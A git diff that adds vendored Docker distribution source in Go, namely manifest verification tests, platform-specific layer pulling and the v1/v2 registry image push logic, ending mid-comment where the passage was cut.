+ verifiedManifest, err := verifySchema1Manifest(&goodSignedManifest, expectedDigest) + if err != nil { + t.Fatal("validateManifest failed:", err) + } + + if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 { + t.Fatal("unexpected FSLayer in good manifest") + } + + // "Extra data" manifest + + extraDataManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/extra_data_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var extraDataSignedManifest schema1.SignedManifest + err = json.Unmarshal(extraDataManifestBytes, &extraDataSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + + verifiedManifest, err = verifySchema1Manifest(&extraDataSignedManifest, expectedDigest) + if err != nil { + t.Fatal("validateManifest failed:", err) + } + + if verifiedManifest.FSLayers[0].BlobSum != expectedFSLayer0 { + t.Fatal("unexpected FSLayer in extra data manifest") + } + + // Bad manifest + + badManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/bad_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var badSignedManifest schema1.SignedManifest + err = json.Unmarshal(badManifestBytes, &badSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + + verifiedManifest, err = verifySchema1Manifest(&badSignedManifest, expectedDigest) + if err == nil || !strings.HasPrefix(err.Error(), "image verification failed for digest") { + t.Fatal("expected validateManifest to fail with digest error") + } +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go new file mode 100644 index 0000000000..45a7a0c150 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go @@ -0,0 +1,13 @@ +// +build !windows + +package distribution + +import ( + "github.com/docker/distribution" + "github.com/docker/distribution/context" +) + +func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + blobs := ld.repo.Blobs(ctx) + return blobs.Open(ctx, ld.digest) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go new file mode 100644 index 0000000000..aefed86601 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go @@ -0,0 +1,49 @@ +// +build windows + +package distribution + +import ( + "net/http" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/registry/client/transport" +) + +var _ distribution.Describable = &v2LayerDescriptor{} + +func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor { + if ld.src.MediaType == schema2.MediaTypeForeignLayer && len(ld.src.URLs) > 0 { + return ld.src + } + return distribution.Descriptor{} +} + +func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + if len(ld.src.URLs) == 0 { + blobs := ld.repo.Blobs(ctx) + return blobs.Open(ctx, ld.digest) + } + + var ( + err error + rsc distribution.ReadSeekCloser + ) + + // Find the first URL that results in a 200 result code. + for _, url := range ld.src.URLs { + logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url) + rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil) + _, err = rsc.Seek(0, os.SEEK_SET) + if err == nil { + break + } + logrus.Debugf("Download for %v failed: %v", ld.digest, err) + rsc.Close() + rsc = nil + } + return rsc, err +} diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go new file mode 100644 index 0000000000..d35bdb103e --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push.go @@ -0,0 +1,186 @@ +package distribution + +import ( + "bufio" + "compress/gzip" + "fmt" + "io" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// Pusher is an interface that abstracts pushing for different API versions. +type Pusher interface { + // Push tries to push the image configured at the creation of Pusher. + // Push returns an error if any, as well as a boolean that determines whether to retry Push on the next configured endpoint. + // + // TODO(tiborvass): have Push() take a reference to repository + tag, so that the pusher itself is repository-agnostic. + Push(ctx context.Context) error +} + +const compressionBufSize = 32768 + +// NewPusher creates a new Pusher interface that will push to either a v1 or v2 +// registry. The endpoint argument contains a Version field that determines +// whether a v1 or v2 pusher will be created. The other parameters are passed +// through to the underlying pusher implementation for use during the actual +// push operation. +func NewPusher(ref reference.Named, endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePushConfig *ImagePushConfig) (Pusher, error) { + switch endpoint.Version { + case registry.APIVersion2: + return &v2Pusher{ + v2MetadataService: metadata.NewV2MetadataService(imagePushConfig.MetadataStore), + ref: ref, + endpoint: endpoint, + repoInfo: repoInfo, + config: imagePushConfig, + }, nil + case registry.APIVersion1: + return &v1Pusher{ + v1IDService: metadata.NewV1IDService(imagePushConfig.MetadataStore), + ref: ref, + endpoint: endpoint, + repoInfo: repoInfo, + config: imagePushConfig, + }, nil + } + return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL) +} + +// Push initiates a push operation on ref. +// ref is the specific variant of the image to be pushed. +// If no tag is provided, all tags will be pushed. +func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushConfig) error { + // FIXME: Allow to interrupt current push when new push of same image is done. + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := imagePushConfig.RegistryService.ResolveRepository(ref) + if err != nil { + return err + } + + endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname()) + if err != nil { + return err + } + + progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName()) + + associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo) + if len(associations) == 0 { + return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name()) + } + + var ( + lastErr error + + // confirmedV2 is set to true if a push attempt managed to + // confirm that it was talking to a v2 registry. This will + // prevent fallback to the v1 protocol. + confirmedV2 bool + + // confirmedTLSRegistries is a map indicating which registries + // are known to be using TLS. There should never be a plaintext + // retry for any of these. + confirmedTLSRegistries = make(map[string]struct{}) + ) + + for _, endpoint := range endpoints { + if imagePushConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 { + continue + } + if confirmedV2 && endpoint.Version == registry.APIVersion1 { + logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL) + continue + } + + if endpoint.URL.Scheme != "https" { + if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS { + logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", endpoint.URL) + continue + } + } + + logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version) + + pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig) + if err != nil { + lastErr = err + continue + } + if err := pusher.Push(ctx); err != nil { + // Was this push cancelled? If so, don't try to fall + // back. + select { + case <-ctx.Done(): + default: + if fallbackErr, ok := err.(fallbackError); ok { + confirmedV2 = confirmedV2 || fallbackErr.confirmedV2 + if fallbackErr.transportOK && endpoint.URL.Scheme == "https" { + confirmedTLSRegistries[endpoint.URL.Host] = struct{}{} + } + err = fallbackErr.err + lastErr = err + logrus.Errorf("Attempting next endpoint for push after error: %v", err) + continue + } + } + + logrus.Errorf("Not continuing with push after error: %v", err) + return err + } + + imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push") + return nil + } + + if lastErr == nil { + lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.FullName()) + } + return lastErr +} + +// compress returns an io.ReadCloser which will supply a compressed version of +// the provided Reader. The caller must close the ReadCloser after reading the +// compressed data. +// +// Note that this function returns a reader instead of taking a writer as an +// argument so that it can be used with httpBlobWriter's ReadFrom method. +// Using httpBlobWriter's Write method would send a PATCH request for every +// Write call. +// +// The second return value is a channel that gets closed when the goroutine +// is finished. This allows the caller to make sure the goroutine finishes +// before it releases any resources connected with the reader that was +// passed in. +func compress(in io.Reader) (io.ReadCloser, chan struct{}) { + compressionDone := make(chan struct{}) + + pipeReader, pipeWriter := io.Pipe() + // Use a bufio.Writer to avoid excessive chunking in HTTP request. + bufWriter := bufio.NewWriterSize(pipeWriter, compressionBufSize) + compressor := gzip.NewWriter(bufWriter) + + go func() { + _, err := io.Copy(compressor, in) + if err == nil { + err = compressor.Close() + } + if err == nil { + err = bufWriter.Flush() + } + if err != nil { + pipeWriter.CloseWithError(err) + } else { + pipeWriter.Close() + } + close(compressionDone) + }() + + return pipeReader, compressionDone +} diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go new file mode 100644 index 0000000000..257ac181ec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v1.go @@ -0,0 +1,463 @@ +package distribution + +import ( + "fmt" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +type v1Pusher struct { + v1IDService *metadata.V1IDService + endpoint registry.APIEndpoint + ref reference.Named + repoInfo *registry.RepositoryInfo + config *ImagePushConfig + session *registry.Session +} + +func (p *v1Pusher) Push(ctx context.Context) error { + tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name) + if err != nil { + return err + } + // Adds Docker-specific headers as well as user-specified headers (metaHeaders) + tr := transport.NewTransport( + // TODO(tiborvass): was NoTimeout + registry.NewTransport(tlsConfig), + registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + ) + client := registry.HTTPClient(tr) + v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) + if err != nil { + logrus.Debugf("Could not get v1 endpoint: %v", err) + return fallbackError{err: err} + } + p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) + if err != nil { + // TODO(dmcgowan): Check if should fallback + return fallbackError{err: err} + } + if err := p.pushRepository(ctx); err != nil { + // TODO(dmcgowan): Check if should fallback + return err + } + return nil +} + +// v1Image exposes the configuration, filesystem layer ID, and a v1 ID for an +// image being pushed to a v1 registry. +type v1Image interface { + Config() []byte + Layer() layer.Layer + V1ID() string +} + +type v1ImageCommon struct { + layer layer.Layer + config []byte + v1ID string +} + +func (common *v1ImageCommon) Config() []byte { + return common.config +} + +func (common *v1ImageCommon) V1ID() string { + return common.v1ID +} + +func (common *v1ImageCommon) Layer() layer.Layer { + return common.layer +} + +// v1TopImage defines a runnable (top layer) image being pushed to a v1 +// registry. +type v1TopImage struct { + v1ImageCommon + imageID image.ID +} + +func newV1TopImage(imageID image.ID, img *image.Image, l layer.Layer, parent *v1DependencyImage) (*v1TopImage, error) { + v1ID := imageID.Digest().Hex() + parentV1ID := "" + if parent != nil { + parentV1ID = parent.V1ID() + } + + config, err := v1.MakeV1ConfigFromConfig(img, v1ID, parentV1ID, false) + if err != nil { + return nil, err + } + + return &v1TopImage{ + v1ImageCommon: v1ImageCommon{ + v1ID: v1ID, + config: config, + layer: l, + }, + imageID: imageID, + }, nil +} + +// v1DependencyImage defines a dependency layer being pushed to a v1 registry. +type v1DependencyImage struct { + v1ImageCommon +} + +func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) { + v1ID := digest.Digest(l.ChainID()).Hex() + + config := "" + if parent != nil { + config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID()) + } else { + config = fmt.Sprintf(`{"id":"%s"}`, v1ID) + } + return &v1DependencyImage{ + v1ImageCommon: v1ImageCommon{ + v1ID: v1ID, + config: []byte(config), + layer: l, + }, + }, nil +} + +// Retrieve the all the images to be uploaded in the correct order +func (p *v1Pusher) getImageList() (imageList []v1Image, tagsByImage map[image.ID][]string, referencedLayers []PushLayer, err error) { + tagsByImage = make(map[image.ID][]string) + + // Ignore digest references + if _, isCanonical := p.ref.(reference.Canonical); isCanonical { + return + } + + tagged, isTagged := p.ref.(reference.NamedTagged) + if isTagged { + // Push a specific tag + var imgID image.ID + var dgst digest.Digest + dgst, err = p.config.ReferenceStore.Get(p.ref) + if err != nil { + return + } + imgID = image.IDFromDigest(dgst) + + imageList, err = p.imageListForTag(imgID, nil, &referencedLayers) + if err != nil { + return + } + + tagsByImage[imgID] = []string{tagged.Tag()} + + return + } + + imagesSeen := make(map[digest.Digest]struct{}) + dependenciesSeen := make(map[layer.ChainID]*v1DependencyImage) + + associations := p.config.ReferenceStore.ReferencesByName(p.ref) + for _, association := range associations { + if tagged, isTagged = association.Ref.(reference.NamedTagged); !isTagged { + // Ignore digest references. + continue + } + + imgID := image.IDFromDigest(association.ID) + tagsByImage[imgID] = append(tagsByImage[imgID], tagged.Tag()) + + if _, present := imagesSeen[association.ID]; present { + // Skip generating image list for already-seen image + continue + } + imagesSeen[association.ID] = struct{}{} + + imageListForThisTag, err := p.imageListForTag(imgID, dependenciesSeen, &referencedLayers) + if err != nil { + return nil, nil, nil, err + } + + // append to main image list + imageList = append(imageList, imageListForThisTag...) + } + if len(imageList) == 0 { + return nil, nil, nil, fmt.Errorf("No images found for the requested repository / tag") + } + logrus.Debugf("Image list: %v", imageList) + logrus.Debugf("Tags by image: %v", tagsByImage) + + return +} + +func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.ChainID]*v1DependencyImage, referencedLayers *[]PushLayer) (imageListForThisTag []v1Image, err error) { + ics, ok := p.config.ImageStore.(*imageConfigStore) + if !ok { + return nil, fmt.Errorf("only image store images supported for v1 push") + } + img, err := ics.Store.Get(imgID) + if err != nil { + return nil, err + } + + topLayerID := img.RootFS.ChainID() + + pl, err := p.config.LayerStore.Get(topLayerID) + *referencedLayers = append(*referencedLayers, pl) + if err != nil { + return nil, fmt.Errorf("failed to get top layer from image: %v", err) + } + + // V1 push is deprecated, only support existing layerstore layers + lsl, ok := pl.(*storeLayer) + if !ok { + return nil, fmt.Errorf("only layer store layers supported for v1 push") + } + l := lsl.Layer + + dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen) + if err != nil { + return nil, err + } + + topImage, err := newV1TopImage(imgID, img, l, parent) + if err != nil { + return nil, err + } + + imageListForThisTag = append(dependencyImages, topImage) + + return +} + +func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) { + if l == nil { + return nil, nil, nil + } + + imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen) + + if dependenciesSeen != nil { + if dependencyImage, present := dependenciesSeen[l.ChainID()]; present { + // This layer is already on the list, we can ignore it + // and all its parents. + return imageListForThisTag, dependencyImage, nil + } + } + + dependencyImage, err := newV1DependencyImage(l, parent) + if err != nil { + return nil, nil, err + } + imageListForThisTag = append(imageListForThisTag, dependencyImage) + + if dependenciesSeen != nil { + dependenciesSeen[l.ChainID()] = dependencyImage + } + + return imageListForThisTag, dependencyImage, nil +} + +// createImageIndex returns an index of an image's layer IDs and tags. +func createImageIndex(images []v1Image, tags map[image.ID][]string) []*registry.ImgData { + var imageIndex []*registry.ImgData + for _, img := range images { + v1ID := img.V1ID() + + if topImage, isTopImage := img.(*v1TopImage); isTopImage { + if tags, hasTags := tags[topImage.imageID]; hasTags { + // If an image has tags you must add an entry in the image index + // for each tag + for _, tag := range tags { + imageIndex = append(imageIndex, ®istry.ImgData{ + ID: v1ID, + Tag: tag, + }) + } + continue + } + } + + // If the image does not have a tag it still needs to be sent to the + // registry with an empty tag so that it is associated with the repository + imageIndex = append(imageIndex, ®istry.ImgData{ + ID: v1ID, + Tag: "", + }) + } + return imageIndex +} + +// lookupImageOnEndpoint checks the specified endpoint to see if an image exists +// and if it is absent then it sends the image id to the channel to be pushed. +func (p *v1Pusher) lookupImageOnEndpoint(wg *sync.WaitGroup, endpoint string, images chan v1Image, imagesToPush chan string) { + defer wg.Done() + for image := range images { + v1ID := image.V1ID() + truncID := stringid.TruncateID(image.Layer().DiffID().String()) + if err := p.session.LookupRemoteImage(v1ID, endpoint); err != nil { + logrus.Errorf("Error in LookupRemoteImage: %s", err) + imagesToPush <- v1ID + progress.Update(p.config.ProgressOutput, truncID, "Waiting") + } else { + progress.Update(p.config.ProgressOutput, truncID, "Already exists") + } + } +} + +func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, imageList []v1Image, tags map[image.ID][]string, repo *registry.RepositoryData) error { + workerCount := len(imageList) + // start a maximum of 5 workers to check if images exist on the specified endpoint. + if workerCount > 5 { + workerCount = 5 + } + var ( + wg = &sync.WaitGroup{} + imageData = make(chan v1Image, workerCount*2) + imagesToPush = make(chan string, workerCount*2) + pushes = make(chan map[string]struct{}, 1) + ) + for i := 0; i < workerCount; i++ { + wg.Add(1) + go p.lookupImageOnEndpoint(wg, endpoint, imageData, imagesToPush) + } + // start a go routine that consumes the images to push + go func() { + shouldPush := make(map[string]struct{}) + for id := range imagesToPush { + shouldPush[id] = struct{}{} + } + pushes <- shouldPush + }() + for _, v1Image := range imageList { + imageData <- v1Image + } + // close the channel to notify the workers that there will be no more images to check. + close(imageData) + wg.Wait() + close(imagesToPush) + // wait for all the images that require pushes to be collected into a consumable map. + shouldPush := <-pushes + // finish by pushing any images and tags to the endpoint. The order that the images are pushed + // is very important that is why we are still iterating over the ordered list of imageIDs. + for _, img := range imageList { + v1ID := img.V1ID() + if _, push := shouldPush[v1ID]; push { + if _, err := p.pushImage(ctx, img, endpoint); err != nil { + // FIXME: Continue on error? + return err + } + } + if topImage, isTopImage := img.(*v1TopImage); isTopImage { + for _, tag := range tags[topImage.imageID] { + progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag) + if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil { + return err + } + } + } + } + return nil +} + +// pushRepository pushes layers that do not already exist on the registry. +func (p *v1Pusher) pushRepository(ctx context.Context) error { + imgList, tags, referencedLayers, err := p.getImageList() + defer func() { + for _, l := range referencedLayers { + l.Release() + } + }() + if err != nil { + return err + } + + imageIndex := createImageIndex(imgList, tags) + for _, data := range imageIndex { + logrus.Debugf("Pushing ID: %s with Tag: %s", data.ID, data.Tag) + } + + // Register all the images in a repository with the registry + // If an image is not in this list it will not be associated with the repository + repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil) + if err != nil { + return err + } + // push the repository to each of the endpoints only if it does not exist. + for _, endpoint := range repoData.Endpoints { + if err := p.pushImageToEndpoint(ctx, endpoint, imgList, tags, repoData); err != nil { + return err + } + } + _, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints) + return err +} + +func (p *v1Pusher) pushImage(ctx context.Context, v1Image v1Image, ep string) (checksum string, err error) { + l := v1Image.Layer() + v1ID := v1Image.V1ID() + truncID := stringid.TruncateID(l.DiffID().String()) + + jsonRaw := v1Image.Config() + progress.Update(p.config.ProgressOutput, truncID, "Pushing") + + // General rule is to use ID for graph accesses and compatibilityID for + // calls to session.registry() + imgData := ®istry.ImgData{ + ID: v1ID, + } + + // Send the json + if err := p.session.PushImageJSONRegistry(imgData, jsonRaw, ep); err != nil { + if err == registry.ErrAlreadyExists { + progress.Update(p.config.ProgressOutput, truncID, "Image already pushed, skipping") + return "", nil + } + return "", err + } + + arch, err := l.TarStream() + if err != nil { + return "", err + } + defer arch.Close() + + // don't care if this fails; best effort + size, _ := l.DiffSize() + + // Send the layer + logrus.Debugf("rendered layer for %s of [%d] size", v1ID, size) + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, arch), p.config.ProgressOutput, size, truncID, "Pushing") + defer reader.Close() + + checksum, checksumPayload, err := p.session.PushImageLayerRegistry(v1ID, reader, ep, jsonRaw) + if err != nil { + return "", err + } + imgData.Checksum = checksum + imgData.ChecksumPayload = checksumPayload + // Send the checksum + if err := p.session.PushImageChecksumRegistry(imgData, ep); err != nil { + return "", err + } + + if err := p.v1IDService.Set(v1ID, p.repoInfo.Index.Name, l.DiffID()); err != nil { + logrus.Warnf("Could not set v1 ID mapping: %v", err) + } + + progress.Update(p.config.ProgressOutput, truncID, "Image successfully pushed") + return imgData.Checksum, nil +} diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go new file mode 100644 index 0000000000..1f8c822fec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/push_v2.go @@ -0,0 +1,697 @@ +package distribution + +import ( + "errors" + "fmt" + "io" + "runtime" + "sort" + "strings" + "sync" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/client" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" +) + +const ( + smallLayerMaximumSize = 100 * (1 << 10) // 100KB + middleLayerMaximumSize = 10 * (1 << 20) // 10MB +) + +// PushResult contains the tag, manifest digest, and manifest size from the +// push. It's used to signal this information to the trust code in the client +// so it can sign the manifest if necessary. +type PushResult struct { + Tag string + Digest digest.Digest + Size int +} + +type v2Pusher struct { + v2MetadataService metadata.V2MetadataService + ref reference.Named + endpoint registry.APIEndpoint + repoInfo *registry.RepositoryInfo + config *ImagePushConfig + repo distribution.Repository + + // pushState is state built by the Upload functions. + pushState pushState +} + +type pushState struct { + sync.Mutex + // remoteLayers is the set of layers known to exist on the remote side. + // This avoids redundant queries when pushing multiple tags that + // involve the same layers. It is also used to fill in digest and size + // information when building the manifest. + remoteLayers map[layer.DiffID]distribution.Descriptor + // confirmedV2 is set to true if we confirm we're talking to a v2 + // registry. This is used to limit fallbacks to the v1 protocol. + confirmedV2 bool +} + +func (p *v2Pusher) Push(ctx context.Context) (err error) { + p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor) + + p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull") + if err != nil { + logrus.Debugf("Error getting v2 registry: %v", err) + return err + } + + if err = p.pushV2Repository(ctx); err != nil { + if continueOnError(err) { + return fallbackError{ + err: err, + confirmedV2: p.pushState.confirmedV2, + transportOK: true, + } + } + } + return err +} + +func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { + if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged { + imageID, err := p.config.ReferenceStore.Get(p.ref) + if err != nil { + return fmt.Errorf("tag does not exist: %s", p.ref.String()) + } + + return p.pushV2Tag(ctx, namedTagged, imageID) + } + + if !reference.IsNameOnly(p.ref) { + return errors.New("cannot push a digest reference") + } + + // Pull all tags + pushed := 0 + for _, association := range p.config.ReferenceStore.ReferencesByName(p.ref) { + if namedTagged, isNamedTagged := association.Ref.(reference.NamedTagged); isNamedTagged { + pushed++ + if err := p.pushV2Tag(ctx, namedTagged, association.ID); err != nil { + return err + } + } + } + + if pushed == 0 { + return fmt.Errorf("no tags to push for %s", p.repoInfo.Name()) + } + + return nil +} + +func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error { + logrus.Debugf("Pushing repository: %s", ref.String()) + + imgConfig, err := p.config.ImageStore.Get(id) + if err != nil { + return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err) + } + + rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig) + if err != nil { + return fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err) + } + + l, err := p.config.LayerStore.Get(rootfs.ChainID()) + if err != nil { + return fmt.Errorf("failed to get top layer from image: %v", err) + } + defer l.Release() + + hmacKey, err := metadata.ComputeV2MetadataHMACKey(p.config.AuthConfig) + if err != nil { + return fmt.Errorf("failed to compute hmac key of auth config: %v", err) + } + + var descriptors []xfer.UploadDescriptor + + descriptorTemplate := v2PushDescriptor{ + v2MetadataService: p.v2MetadataService, + hmacKey: hmacKey, + repoInfo: p.repoInfo, + ref: p.ref, + repo: p.repo, + pushState: &p.pushState, + } + + // Loop bounds condition is to avoid pushing the base layer on Windows. + for i := 0; i < len(rootfs.DiffIDs); i++ { + descriptor := descriptorTemplate + descriptor.layer = l + descriptor.checkedDigests = make(map[digest.Digest]struct{}) + descriptors = append(descriptors, &descriptor) + + l = l.Parent() + } + + if err := p.config.UploadManager.Upload(ctx, descriptors, p.config.ProgressOutput); err != nil { + return err + } + + // Try schema2 first + builder := schema2.NewManifestBuilder(p.repo.Blobs(ctx), p.config.ConfigMediaType, imgConfig) + manifest, err := manifestFromBuilder(ctx, builder, descriptors) + if err != nil { + return err + } + + manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return err + } + + putOptions := []distribution.ManifestServiceOption{distribution.WithTag(ref.Tag())} + if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil { + if runtime.GOOS == "windows" || p.config.TrustKey == nil || p.config.RequireSchema2 { + logrus.Warnf("failed to upload schema2 manifest: %v", err) + return err + } + + logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err) + + manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag()) + if err != nil { + return err + } + builder = schema1.NewConfigManifestBuilder(p.repo.Blobs(ctx), p.config.TrustKey, manifestRef, imgConfig) + manifest, err = manifestFromBuilder(ctx, builder, descriptors) + if err != nil { + return err + } + + if _, err = manSvc.Put(ctx, manifest, putOptions...); err != nil { + return err + } + } + + var canonicalManifest []byte + + switch v := manifest.(type) { + case *schema1.SignedManifest: + canonicalManifest = v.Canonical + case *schema2.DeserializedManifest: + _, canonicalManifest, err = v.Payload() + if err != nil { + return err + } + } + + manifestDigest := digest.FromBytes(canonicalManifest) + progress.Messagef(p.config.ProgressOutput, "", "%s: digest: %s size: %d", ref.Tag(), manifestDigest, len(canonicalManifest)) + + if err := addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err != nil { + return err + } + + // Signal digest to the trust client so it can sign the + // push, if appropriate. + progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)}) + + return nil +} + +func manifestFromBuilder(ctx context.Context, builder distribution.ManifestBuilder, descriptors []xfer.UploadDescriptor) (distribution.Manifest, error) { + // descriptors is in reverse order; iterate backwards to get references + // appended in the right order. + for i := len(descriptors) - 1; i >= 0; i-- { + if err := builder.AppendReference(descriptors[i].(*v2PushDescriptor)); err != nil { + return nil, err + } + } + + return builder.Build(ctx) +} + +type v2PushDescriptor struct { + layer PushLayer + v2MetadataService metadata.V2MetadataService + hmacKey []byte + repoInfo reference.Named + ref reference.Named + repo distribution.Repository + pushState *pushState + remoteDescriptor distribution.Descriptor + // a set of digests whose presence has been checked in a target repository + checkedDigests map[digest.Digest]struct{} +} + +func (pd *v2PushDescriptor) Key() string { + return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String() +} + +func (pd *v2PushDescriptor) ID() string { + return stringid.TruncateID(pd.layer.DiffID().String()) +} + +func (pd *v2PushDescriptor) DiffID() layer.DiffID { + return pd.layer.DiffID() +} + +func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { + if fs, ok := pd.layer.(distribution.Describable); ok { + if d := fs.Descriptor(); len(d.URLs) > 0 { + progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") + return d, nil + } + } + + diffID := pd.DiffID() + + pd.pushState.Lock() + if descriptor, ok := pd.pushState.remoteLayers[diffID]; ok { + // it is already known that the push is not needed and + // therefore doing a stat is unnecessary + pd.pushState.Unlock() + progress.Update(progressOutput, pd.ID(), "Layer already exists") + return descriptor, nil + } + pd.pushState.Unlock() + + maxMountAttempts, maxExistenceChecks, checkOtherRepositories := getMaxMountAndExistenceCheckAttempts(pd.layer) + + // Do we have any metadata associated with this layer's DiffID? + v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID) + if err == nil { + // check for blob existence in the target repository if we have a mapping with it + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata) + if exists || err != nil { + return descriptor, err + } + } + + // if digest was empty or not saved, or if blob does not exist on the remote repository, + // then push the blob. + bs := pd.repo.Blobs(ctx) + + var layerUpload distribution.BlobWriter + + // Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload + candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata) + for _, mountCandidate := range candidates { + logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository) + createOpts := []distribution.BlobCreateOption{} + + if len(mountCandidate.SourceRepository) > 0 { + namedRef, err := reference.WithName(mountCandidate.SourceRepository) + if err != nil { + logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err) + pd.v2MetadataService.Remove(mountCandidate) + continue + } + + // TODO (brianbland): We need to construct a reference where the Name is + // only the full remote name, so 